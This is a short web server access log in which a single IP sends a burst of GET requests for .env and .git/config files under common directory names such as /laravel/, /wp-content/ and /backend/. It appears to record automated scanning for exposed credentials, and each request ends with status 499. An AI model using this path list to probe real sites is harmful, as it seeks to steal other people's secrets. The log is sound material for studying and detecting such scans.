34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /core/.git/config HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /site/.env HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /laravel/.env HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /wp-content/.env HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /src/.env HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:49 +0800] "GET /cms/.env HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:50 +0800] "GET /backend/.git/config HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:50 +0800] "GET /backend/.env HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:50 +0800] "GET /site/.git/config HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:50 +0800] "GET /api/.git/config HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:50 +0800] "GET /application/.git/config HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:50 +0800] "GET /web/.env HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:52 +0800] "GET /vendor/.env HTTP/1.1" 499 0 "-" "Mozilla/5.0"
34.96.49.105 - - [23/Jul/2026:23:42:52 +0800] "GET /cms/.git/config HTTP/1.1" 499 0 "-" "Mozilla/5.0"